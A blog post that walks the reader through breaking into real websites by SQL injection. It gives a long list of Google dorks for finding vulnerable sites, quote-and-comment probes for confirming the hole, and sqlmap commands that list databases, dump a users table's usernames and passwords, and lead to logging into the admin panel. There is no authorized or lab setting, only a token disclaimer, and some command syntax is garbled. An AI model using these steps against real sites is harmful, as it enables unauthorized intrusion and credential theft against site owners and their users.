Recents in Beach

SQL Injection Website Hack By SQLMAP



Step 1: Finding Vulnerable Website:
find the Vulnerable websites using Google Dork list
Dorks: Some Examples:
inurl:index.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:pageid="inurl:index.php?catid=""inurl:news.php?catid=" "inurl:index.php?id=""inurl:news.php?id="inurl:index.php?id= inurl:trainers.php?id=  inurl:buy.php?category= inurl:article.php?ID=  inurl:play_old.php?id= inurl:declaration_more.php?decl_id=  inurl:pageid=
inurl:games.php?id=  inurl:page.php?file= inurl:newsDetail.php?id=  inurl:gallery.php?id=
inurl:article.php?id=  inurl:show.php?id=  inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id=  inurl:top10.php?cat= inurl:historialeer.php?num=
inurl:reagir.php?num=  inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id=
inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id=
inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id=
inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id=  inurl:sem.php3?id=
inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id=
inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id=
inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id=inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id=
inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id=
inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id=
inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID=
inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id=
inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id=
inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id=
inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id=
inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id=
inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id=
inurl:shredder-categories.php?id= inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id=
inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id=
inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id=inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id=inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id=
inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id=
inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id=
inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in=
inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID=
inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id=
inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt=
inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id=

copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
http://www.cybertricks4u.com/

Note: if you like to hack particular website, then try this:
site: www.victimsite.com  dork_list_commands
for eg:
site: www.victimsite.com inurl:index.php?id=
Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(‘) at the end of the url and hit enter. (No space between the number and single quotes)
For eg:
http://www.victimsite.com/index.php?id=2'
https://www.site.com/index.php?id=1'
And we Get Error . It Means That Site Is Vulnerable For SQL Injection. Here Some Other Ways To Check Website Vulnerbility.
Using Closed Bracket )
https://www.site.com/index.php?id=1)
Using Single Quote '
https://www.site.com/index.php?id=1'
Using Double Quote "
https://www.site.com/index.php?id=1"
Now Next Step Is To Count Total Number Of Columns .
First Check Comment Type to Balance Our Query.
Here Are Some Basic Comments .
https://www.site.com/index.php?id=1--
https://www.site.com/index.php?id=1--+
https://www.site.com/index.php?id=1-- -
https://www.site.com/index.php?id=1--+-
https://www.site.com/index.php?id=1%23
https://www.site.com/index.php?id=1;

(Using Kali Operating System-See Software Section)  


Step 3: Open terminal (CTRL + ALT + T)


Step 4: One More Method To Open Terminal
Click Application
Open terminal



Step 5: Now Type command
sqlmap –u www.targetsite.com index.php?id=2 --dbs
Hit enter

 



Step 6:   command
sqlmap –u www.targetsite.com index.php?id=2 –D caliduzb_calidussql --tables
Hit enter




Step 7:   command
sqlmap –u www.targetsite.com index.php?id=2 –D caliduzb_calidussql –T users --columns
Hit enter




Step 8:  Type
sqlmap –u www.targetsite.com index.php?id=2 –D caliduzb_calidussql –T users –C username,0x3a,user_password --dump
Hit enter



Step 9:  Now you can see all username & password 



Step 10:  you can see password on Hash form crack the hash form ….



Step 11: Now you can see password is root so go admin panel on a website and login .  




Find Admin Login Panel Of a Website click here

Install SQLMAP on window 7,8,10 Click here 


Legal Disclaimer : This tutorial is completely for educational purpose only. For any misuse of this tutorial by any means the author will not be held responsible.  

If you have any queries Please comment my posts.

Post a Comment

0 Comments